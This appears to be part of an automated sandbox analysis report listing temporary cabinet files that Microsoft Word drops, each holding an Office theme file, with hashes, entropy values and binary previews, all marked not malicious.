                                                                                                                                                        Preview:MSCF.....F......D................g...........F...?..........|..................L.. .content.inf.zG.........L.. .Parcel.thmx.>2...R..[...0...........7....B+...BH....{...^.../.....B{...1....+".....<.....$........{.......sD"..j...}... P..w..U..f...6.x8. ...C..F.q.7....T.6p......B.P..L..g......A..43.W`.....{{...u.4...:.bb.4"X..m..)$..@(H. H.tBPTF..,.&.B.'...6..2...n..c%...Z@.(.@.......(.<i.i....P......?......o.......F.M.L......i.....C..7..../.....MQ.0..l.U.s.Fu.......1...p.;.(.}..ogd..<.._.Z......._.......O.J......97...~<...4.c....i..........'k.5.......Q.$..C..E... ..5.7....N.a.[ns6hi..kM....?....X......*9q...!O\....0....n.^s.9.6..............;. ..r...rf..C6z..v #.H...O...v/.sl....J.m%.L.Dp.e....*uO..g.y....f...].5.*........W.....h^[..w.|.=.ru.|.M..+.-.B...D.Ma....o.<X SnI....l...{..G..,..y5\W.@..y.;.y ...M..l.....e..A...d.e!.E..3.......k1.......6gY).../....pQ..?..s.W.)+R.S5..../.0..vz.^.......k.....v..9..A.NG...N~#..$.B...*s,(.o.@.ar.!.J.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab81C4.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):550906
                                                                                                                                                        Entropy (8bit):7.998289614787931
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:12288:N4Ar9NyDhUQM0Hk86V1YnOIxQ9e6SJbj2OjK:jAG8wa5Qw6SZ2Oj
                                                                                                                                                        MD5:1C12315C862A745A647DAD546EB4267E
                                                                                                                                                        SHA1:B3FA11A511A634EEC92B051D04F8C1F0E84B3FD6
                                                                                                                                                        SHA-256:4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0
                                                                                                                                                        SHA-512:CA8916694D42BAC0AD38B453849958E524E9EED2343EBAA10DF7A8ACD13DF5977F91A4F2773F1E57900EF044CFA7AF8A94B3E2DCE734D7A467DBB192408BC240
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....*#......D...............Q...........*#...D..........~..................M{. .content.inf............M{. .Parallax.thmx.9... y..[......(..b.P...E.Q*.R.".RTH.%.T..F......u.{.*+.P.....FK*0].F...a{...D4`D..V.../.P,....2.Mx...u......0...E...{A-"J...)jl_.A..T......u.Y....ZG:....V.A.#~.. ..6..............o..X..<.... .......C.ce.f!nA.).p...p........n..................'6w6H6s.j....l...{?.h..........]..l.....v....%..l}A..................3...W_73.j......6...F.../..qG.?........H..).........7.&km....`m2..m.W.q.<../~<..6*.78..X~.e+..CC*w...T...6....AB..l..._.f......s.e....2....H..r.R.Z....a.,..\Q.q..._SJJ....7.S.R....=f..>....9=....NnC.....].-...\..Z..q..j...q.....Nj..^'..k...Zl.~PRvpz.J..+.C...k.z.w=l.#.............n...C..s.kM.@B{..vL.e....E..(/......f...g..=..V...}...).=s.....y!.,...X.[..[.....\31}..D%...%..+G66.j.v./.e9...P;.o.y..U+...g.g.S.../..B._L..h...Oi.._...:..5ls>>........n6.F.Q..v>..P.r:.a..Z....a...x..D....N...i..=L.u......<;Nv.X/*.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab8233.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):723359
                                                                                                                                                        Entropy (8bit):7.997550445816903
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:12288:NPnBZX7wR3tMwYqNDQGnXTtfzO5U7yo6O7bLhe8yE3LLDok4a:JBMbYE7xzO5U917bLh/DL3oJa
                                                                                                                                                        MD5:748A53C6BDD5CE97BD54A76C7A334286
                                                                                                                                                        SHA1:7DD9EEDB13AC187E375AD70F0622518662C61D9F
                                                                                                                                                        SHA-256:9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351
                                                                                                                                                        SHA-512:EC8601D1A0DBD5D79C67AF2E90FAD44BBC0B890412842BF69065A2C7CB16C12B1C5FF594135C7B67B830779645801DA20C9BE8D629B6AD8A3BA656E0598F0540
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....?.......D...........................?...`J..............3..............M.. .content.inf..+.........M.. .Wood_Type.thmx......r..[.........................!.wwwwqwwwwwwwwwww..."....+......nR..x..\..w..r.5R.....(|.>.$e3.!..g....f..`9NL......o./.O.bxI...7.....|........6.n."J.....4^g.........?...................o.......s3.....8. .T.j...._.Z.Q.t.k,(o.c.t.......?Z....`o........?.a....6.)....6b..../.t...........Mz....q}......C.......+{.......o...K.tQjt............7.._....O.....\....` ..............@..`....%..t....V.]........m..m....u..1.yr;..t..F.'..+{....zqvd.g._..$H..Vl...m..../....g..rG.....:*......8....h...[...a06...U.W....5.Z.W..1I..#.2.....B3...x....$PRh...\{J.c.v.y..5+Y.W.N..hG......<..F..W.d8_....c...g....p|7.]..^.o.H.[$Zj..{4......m.KZ..n.T%...4.Z..Y."q7?kuB......U....).~.......W%..!.e.U.mp.o...h...?.w...T.s.YG#......Y.}....Z.O.i.r,...n..4.\....P..m..=....f........v....g....j...*.wP..4.VK.y.z...C..oum.b.1......?.Z.>.7.!?......A..Q>..Z....-

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab8244.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):640684
                                                                                                                                                        Entropy (8bit):7.99860205353102
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:12288:eV7ivfl+kbkIrWu+2aoRjwv/cSUWauGPo2v65s4QqcT3ZCCz6CSj8aC:fdhr1+3y4MWaC2CO4V+3ZCCDsO
                                                                                                                                                        MD5:F93364EEC6C4FFA5768DE545A2C34F07
                                                                                                                                                        SHA1:166398552F6B7F4509732E148F93E207DD60420B
                                                                                                                                                        SHA-256:296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899
                                                                                                                                                        SHA-512:4F0965B4C5F543B857D9A44C7A125DDD3E8B74837A0FDD80C1FDC841BF22FC4CE4ADB83ACA8AA65A64F8AE6D764FA7B45B58556F44CFCE92BFAC43762A3BC5F4
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF............D................4...............?..........~..................M. .content.inf."..........M. .Quotable.thmx..^.u.n..[...............&...U..F.......UU.M.T5.UUQS..j..#>43fD.....`....Vr......19'...P..j.-...6n.0c....4$.c....$.4.k3aQ$.lCN.#.[.."qc....,Z...,Qt@!.@...... ...H.......9.9.y.{....[.`..s3.5.....B....W.g.d...[uv.UW..............P.8.(.?......3.....'/F...0...8.P. .O..B....K...g..L.......#s...%..|4.i....?.3b.".....g...?.........2.O23..'..O~.+..{...C.n.L......3......Y.L...?K...o......g....@.]...T..sU.....<.._.<G.......Tu.U2..v.&..<..^..e.].cY;..9.%..}...I.y.;...WM...3>.:.=.|.-.AtT2OJ.I.#...#.y....A....\]$r...lM.%5.."...+7M..J.....c...".&$.... Y.r.B;..81B. +H...b....@7K.*.F.Z...v..=..ES.f.~.."...f..ho.X.E.a`~*...C>.&..@\.[....(.....h..]...9&...sd.H .1.x.2..t.rj..o..A..^qF.S9.5.....E.{...C|.w.c/V...0Q.M...........O.7;A4u...R..Z.B.7a.C`....p.z.....f!|.u.3t....2e.wWH..'7p....E_...e.._;..k....*&E.^.f=V..{*..al.y:.4a...+.g...-..>e

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab82B4.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):698244
                                                                                                                                                        Entropy (8bit):7.997838239368002
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:12288:bUfKzAwwP7XAMWtr4FvMRt4lX0hnBdThiSb32+TdysrQgn7v4EemC6:sr7AMkJ34xu1bm4ZrQaY6
                                                                                                                                                        MD5:E29CE2663A56A1444EAA3732FFB82940
                                                                                                                                                        SHA1:767A14B51BE74D443B5A3FEFF4D870C61CB76501
                                                                                                                                                        SHA-256:3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE
                                                                                                                                                        SHA-512:6BC420F3A69E03D01A955570DC0656C83C9E842C99CF7B429122E612E1E54875C61063843D8A24DB7EC2035626F02DDABF6D84FC3902184C1EFF3583DBB4D3D8
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....lh......D...............P...........lh...?..........|..................M. .Berlin.thmx............M. .content.inf..lH.lj..[...............7.I..)........P..5x.B/^y5.xk^^......D.F........s....y...?D.....*.....&....".o..pl..Q.jm?_...6......=%.p.{.)S..y...$......,4..>#.........)..."-....K....4.E...L=.......4..p.c..nQ.0..ZO.#.....e.N..`U......oS....V..X[t.E)|.h..R....$..}.{.F.7....^.....w.,...5rBR.....{.......mi...h.b......w+..;.hV......q..(.7&.Z.l...C."j........[-E4h.....v&..~.p$|\X...8.....Fj'%,.)6w...u|C..,y..E..`*Up../(....2.(....Z.....,.'...d..s..Z....5.g.?Nq..04...f...D.x....q+.b.."v`{.NL....C..... ..n......1N+.I.{W9....2r.0...BaC.....O..=...k..."..8.D\jK.B...Aj....6,B..2...I.. B..^.4..1.K+.....DP...Mr....9..x[...>........?.Zd..'._2.._..>..'.F..#.w...2..~.|........q_Wy.W.....~..Qex.km/..f......t.q..p..gm.|.x.... ,.#\Z....p....a.}...%..v.J.Es......I.b.P?...0......F.x....E..j..6.%..E..-O.k...b .^.h.Cv...Z....D.n.d:.d.F..x...[1...B..

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab846B.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):953453
                                                                                                                                                        Entropy (8bit):7.99899040756787
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:24576:9B1Onw3vg7aeYPagzbJ5Vhv6LnV2Dhl7GEYqVjcyd:vww3o7BYPJbJ5Vh6UCqZfd
                                                                                                                                                        MD5:D4EAC009E9E7B64B8B001AE82B8102FA
                                                                                                                                                        SHA1:D8D166494D5813DB20EA1231DA4B1F8A9B312119
                                                                                                                                                        SHA-256:8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D
                                                                                                                                                        SHA-512:561653F9920661027D006E7DEF7FB27DE23B934E4860E0DF78C97D183B7CEBD9DCE0D395E2018EEF1C02FC6818A179A661E18A2C26C4180AFEE5EF4F9C9C6035
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....]M......D...............=...........]M...?..........}..."..............Li. .content.inf............Li. .Gallery.thmx.].(.Vq..[.....0Y..........v.....w.wwwww.wwwwww.w.....".83....y8..mg...o*..U..N(..@uD.:O<........{.G....~~.....c.c.5..6./|G .@#1O.B.............PT@...b.d.~..U....B.{.........0.H.....`.H.`..'S.......Ic..W..x...z....... .........g......._....o......S......p...$....._........._...K......x..?.6.U~...'./.r.................../.......5.8..2........2b.@j ....0.........``....H... ,5...........X........|..Y.QoiW..*|.......x.sO8...Yb....7...m..b.f.hv..b......=...:Ar.-...[..A\.D..g..u....].9..M...'.R-`.....<..+.....]...1.^..I.z..W{.._....L.. ...4;..6O.....9,.-.Vt+b/$7..}.O05.Y...-..S.....$*.....1."Z.r;.!..E.mMN..s .U...P%.[.P...cU...j...h.d.../.s..N/..:..X*...p5.7\}h.Q ..._.F.X.C..z$.nV..+.k..|.@.L...&.........^#.G.a..x..w!wx.8e+..E. i..$?9..8...:......|..[."..y..&y..?...W....s..._...3Z0c.....i.q.........1c.jI....W..^%xH.._...n.......&J..

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab849B.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1065873
                                                                                                                                                        Entropy (8bit):7.998277814657051
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:24576:qehtHA3nsAOx7yN7THwxdGpkw8R60aTcua5U4c:hhmnsBMNAxdGpV5za5Uv
                                                                                                                                                        MD5:E1101CCA6E3FEDB28B57AF4C41B50D37
                                                                                                                                                        SHA1:990421B1D858B756E6695B004B26CDCCAE478C23
                                                                                                                                                        SHA-256:69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E
                                                                                                                                                        SHA-512:B1EDEA65B6D0705A298BFF85FC894A11C1F86B43FAC3C2149D0BD4A13EDCD744AF337957CBC21A33AB7A948C11EA9F389F3A896B6B1423A504E7028C71300C44
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....q.......D...........................q... ?..........{...%..............M. .content.inf.Q_.........M. .Savon.thmx...O>.o..[..............&.5....UUcC.C....A...`TU...F....".54.E.....g.-.7-D....1g...p.6......@..w(....h'?.....(..........p..J.2n$4.........A......?...........@.C.W.R.5X..:..*..I..?....r.y..~!.....!.A.a...!........O.........5.x<C...?.?....C.C.......'....F../....../.$................4.7...................P...(.w.}6.........7.....01.1r........._..?.............'.._..JOx.CFA<.........*0..2.?...>F.../...;..6-8..4...8&yb....".1%..v'..N...x......}.gYb..~L.....f[..!......Y.G.....p..r...?.p...F.Vy.....o.Whll...+...M.V...:.]...B.%.H....n..@.].zaVxf...y{.@....V.t.W....$Kp-.....7W.J..h..0A3mK.=.ub..R...W......*'T2..G#G,.^..T..XZu...U. ...76.d..#.I.JB.v...d...%.....6..O.K.[.:.L.\.....1.D..2a.>f......X...b5...ZgN.u.f...a!..."...sx....>..?.a.3.8.^._q..JS1.E..9..Lg.n.+....lE.f:j.9)Q..H1=..<.R.......{c>:.p[..S.9h.a.gL.U....8.z..z.!.....2I.~.b..2..c...

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab850C.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1097591
                                                                                                                                                        Entropy (8bit):7.99825462915052
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:24576:UE9BMy98gA4cDWHkSrDans3MfEE6w8OaVuCibol0j41dwD:UE9Bdy3D4keQWt7w85VuVoaj4/Q
                                                                                                                                                        MD5:BF95E967E7D1CEC8EFE426BC0127D3DE
                                                                                                                                                        SHA1:BA44C5500A36D748A9A60A23DB47116D37FD61BC
                                                                                                                                                        SHA-256:4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26
                                                                                                                                                        SHA-512:0697E394ABAC429B00C3A4F8DB9F509E5D45FF91F3C2AF2C2A330D465825F058778C06B129865B6107A0731762AD73777389BB0E319B53E6B28C363232FA2CE8
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF............D...............-,..............x?..........}...-...RU.........M. .Circuit.thmx.....RU.....M. .content.inf.g...&|..[......=..R.....=.*,.!QA?h..Q.!....Uk!.HJ.......VKuk.....q.w.w.U.....;...K.@.URA..0..B..|rv.ND(.`{..@.1.}...s?.....-...O.(V.w..1..a.....aW...a.Z..aX....5.I...!..........(. ./.d...me.( ..f.........w.......Xp.s....c..vB.98.....C.J......V ..ML.M...B.n.>...|....u!.5@t..q4....(K...u qL.S....>/%v%.2..TF.].e..'..-..L.N..c].a..(WU\o.%^..;...|o.6..L..[..;&....^p.Lu.sr,-.R=.:.8.>VOB...:.?$.*h.o....Zh.h....`.B.c.../K......b^...;2..bY.[.V.Q8....@..V7....I0c.cQN7..I.p..}..!..M....1K....+....9.2......a..W.V..........;.J .i......]%O.-......CeQ.0.c....MbP3.0.w..8w..Y...|...H;#.J.+M......>.`y..aWk|.i.BF.pJv;.....S..6....F.....RLG~..........J.=......"..........H.....h..o...u........M.6F?.F.p.B.>./*l....J.R..#P.....K......<iu..gm^..n...#c..zO"7M.O......4'>A..(.E.Cy.N.)....6.tx.r[.....7.......m.t..E?.....5.5.6.\..{.V.T.D.j..=~a^.I

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab8675.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1310275
                                                                                                                                                        Entropy (8bit):7.9985829899274385
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:24576:NN3M9UHpHZE4aubaPubP3M6d71FdtmFAjq+54/79LVzG+VnS:NN3M9UJHZE4abPyU4JtmFCq+q/7JlVS
                                                                                                                                                        MD5:9C9F49A47222C18025CC25575337A965
                                                                                                                                                        SHA1:E42EDB33471D7C1752DCC42C06DD3F9FDA8B25F0
                                                                                                                                                        SHA-256:ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A
                                                                                                                                                        SHA-512:9FDCBAB988CBE97BFD931B727D31BA6B8ECF795D0679A714B9AFBC2C26E7DCF529E7A51289C7A1AE7EF04F4A923C2D7966D5AF7C0BC766DCD0FCA90251576794
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF...........D...............9..............XJ..........}...6..............M.. .content.inf............M.. .Droplet.thmx..m7.>J..[...............2.QQPIj.*.."o^R.H5*^...^(e.W...R..x..^`..m...."..+.....{o.......Q.-....$V.N>...T]..L.... ..N.h..dOY.......S......N.%.d..d....Y.....e..$...<.m...`............@....=.z..n..[...,G..1Fn.qPDH{C<...3.Q...2..r..*...E.E.E.ErM"&a..'..W....:...?I..<.I..6o.`.d.?!..!..._.4\.._.E..).._O.S....; ..#..p.H.....c....o\.K..?$U.e.........!...J.v.....gNe._..[....#A.O.n_.....gm:P._.........{@..-g..j.69b.NH.I.$Hk?.6.n...@......'.C.._.U..:*,j.-G.....e.#.Sr.t.L......d[.[...s.....rx.3.F[.5o..:....K*.x..)M.fb...3IP.&h.Q.VX^%U.......x..l......@6.k.P..zSW.?....F..[L...4..b.l.w."&.....`.j...i.5}".~.-.....{\.:...o.'H\*+)....3.Y......\...f:.;....e........4't7..f...w..j...3....N..9`.J...P..?.....=3_.y]...f.<.......JM5.}Q/ .F.a..Z.._yh......V..>m .......a....f....!.hz..\.....F_..'z...,....h.=.......=.o..T....3.e..........$..g.2.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab88E8.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1766185
                                                                                                                                                        Entropy (8bit):7.9991290831091115
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:24576:O/gjMj+RP9Q07h9F75a0BXjBccHMVk2Hq2SkGa0QglyZtxmdPP2LcSUtfgfp16Yx:kJ6RP9Q07/X5V7yVF0QgktxAPutUt0zP
                                                                                                                                                        MD5:828F96031F40BF8EBCB5E52AAEEB7E4C
                                                                                                                                                        SHA1:CACC32738A0A66C8FE51A81ED8E27A6F82E69EB2
                                                                                                                                                        SHA-256:640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7
                                                                                                                                                        SHA-512:61F6355FF4D984931E79624394CCCA217054AE0F61B9AF1A1EDED5ACCA3D6FEF8940E338C313BE63FC766E6E7161CAFA0C8AE44AD4E0BE26C22FF17E2E6ABAF7
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF............D...............)q..............0?..........{...H..............M.. .content.inf.;.#........M.. .Slate.thmx.p.+..P..[......U..............p..K.!.......*...K..w..v........=....D$r...B....6 ...X.F0..d..m.s...$$r........m.)6.m3....vXn.l..o...a...V......Ru.:=2M.........T.....4S`EP......\..r,..v...G.P......'._H0]..%_............X.P.,.............H.?.-.H..".......M..&..o....R........<......`...D.H.._.G.Qv..(.*.U,.9..D...."..T..i.e../.e.."....,S...o.X.....c./..V....Z..o.O..2....{...+... ....0.@J.R.Q.m.....{.....h?u.q.O{...l.d)..Yk`.....#...u.-.m..#CXwrz4..7.>......v.E:.#.oGSKS.TX.Chm.4aQ......avH..{..j+@6[k].....`c..W8..j.v.Zh.]....4......K..#Hzyd..K}.....H|<H..\(l...+..%Z......~.S:^..d>..1..H%..7N-v.....Wu.*..b^.B.....k0gc.2.{.!...E7.}3.d...{.Ye...&#f6...:2......v..&!..k0d.p.b...,..$.....Y..60...h.N}.r...<[./........{...Es..&.nf.....2.@Fh3.9.G....l.[.C..SD/6.H.K....}..m....M..........gl.P.]..I......5....e.c...V....P...[.=.......O.eq+

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab8996.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1881952
                                                                                                                                                        Entropy (8bit):7.999066394602922
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:49152:6Wp9u/ZAvKz7ZFCejPiSmYXKIr6kBwBUA:6W6Bn7ZFNiiKo2l
                                                                                                                                                        MD5:53C5F45B22E133B28D4BD3B5A350FDBD
                                                                                                                                                        SHA1:D180CFB1438D27F76E1919DA3E84F307CB83434F
                                                                                                                                                        SHA-256:8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273
                                                                                                                                                        SHA-512:46AD3DA58C63CA62FCFC4FAF9A7B5B320F4898A1E84EEF4DE16E0C0843BAFE078982FC9F78C5AC6511740B35382400B5F7AC3AE99BB52E32AD9639437DB481D1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF.....x......D...............l............x..`?..........|...D..............M[. .content.inf...!........M[. .Damask.thmx...o.PI..[.............../.TU.jj0..3jCUPU.jF...m.UU.P}.....PU..*........w..#....E..].................A.. w.$..@..'g.......6%:..r9..d.M;M+.r.8[d{.s..dh..(P..........!.. ..ne..f.Nc..#..Y..q....KB}..b].@..F.&.t....E.........@&.m......$w......q...:.H....p.p.....?.9x.. .....?...ao....I....................o......g.u..;."....O;....{..(k..._.w/.Z......Jb..P.O?...........?....F....ty..72......! #....v..J......?.....!,.5.7..Em.....is.h.. \.H*)i1v..zwp.....P.....x].X{O//..\....Z>z....6...+..a.c...;.K..+...?014..p.w%o^.....]...MguF...`....r.S.......eF..):.dnk#.p{..<..{..Ym...>...H......x.}.hI..M....e......*G.&.?..~.~G6.....+...D..p...._...T....F6.[Cx./Q..Xe.>.;.}>.^..:..SB.X..2.......(A..&j9....\\.......Haf+]Y...$t^Y=........><.w....tL../E...%6.Vr~MI...l.....<.0.I....7.Q8y.f.uu...I.p..O..eYYS.O......9..Qo.......:..........o.............{

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab8E7A.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2527736
                                                                                                                                                        Entropy (8bit):7.992272975565323
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:49152:NFXdpz4d98p/q5jA4q+9Uf5kx6wHR8WfPJZVhWzH4dRze76YP9nJ7yyAInT76nSY:NFXdKx5sM9SmxHKexZVhutJJVpCSqa0Z
                                                                                                                                                        MD5:F256ACA509B4C6C0144D278C7036B0A8
                                                                                                                                                        SHA1:93F6106D0759AFD0061F73B876AA9CAB05AA8EF6
                                                                                                                                                        SHA-256:AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67
                                                                                                                                                        SHA-512:08C57661F8CC9B547BBE42B4A5F8072B979E93346679ADE23CA685C0085F7BC14C26707B3D3C02F124359EBB640816E13763C7546FF095C96D2BB090320F3A95
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF.....R&.....D............................R&.8?..............Z..............M). .content.inf..,........M). .Main_Event.thmx......R..[...............=.1.^xa..^...../..^x....QA^"....^/.I.{/F..F..........6Vn. ..._Hmc......<....#.{.@.....Xl../Y....Ye..'V.f.S.Vf.T..0t+..y...5O...{.....-.dT...........!...[ .ns..k.....QAA.. ....B..u.`.....{.\u8.0.....@t........K....@..w.......>...-1F...........1.E....O............_M.m..CP.O......X......g......].../..:C...Q...i.._"...M..1o...S../...9....k;...}S........y..;1o....1h......t.CL.3...].@...T...4.6.}.....M...f...[.s.."f....nZ.W......0.c.{.`.^..Oo.[.JT.2].^.f..a....kO......Q..G..s.5...V.Wj.....e...I,]...SHa..U.N.N.....v.C.....x..J{.Z.t...]WN...77BO-J......g......3:i..2..EFeL.,n..t:..,~4gt.w...M.5.'h.L..#..A&.O.ys%K.Z....F.PW..=jH...jGB.i..j.J.^.#.\n...J@.....-5.f.1jZ68.o...H2.......$O...>..ld&,#$.&_....yl.fkP$.........l....s....i.tx.~<.z...>..2.Gx..B..z.E.3.N<....`$.....b..?.w.[.X..1.=q!.s......v.......r.w

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab8E7B.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2591108
                                                                                                                                                        Entropy (8bit):7.999030891647433
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:49152:ZSBBeAefkpB5iXfQJgi7JBaCCRZ3cM2VDHkvSJO6qzI1tE9Rn:EBI6gbCkMPDHKSJO6qsP6n
                                                                                                                                                        MD5:BEB12A0464D096CA33BAEA4352CE800F
                                                                                                                                                        SHA1:F678D650B4A41676BA05C836D462F34BDC5BF648
                                                                                                                                                        SHA-256:A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA
                                                                                                                                                        SHA-512:B6E7CCD1ECBB9A49FC72E40771725825DAF41DDB2FF8EA4ECCE18B8FA1A59D3B2C474ADD055F30DA58C7E833A6E6555EBB77CCC324B61CA337187B4B41F7008B
                                                                                                                                                        Malicious:false
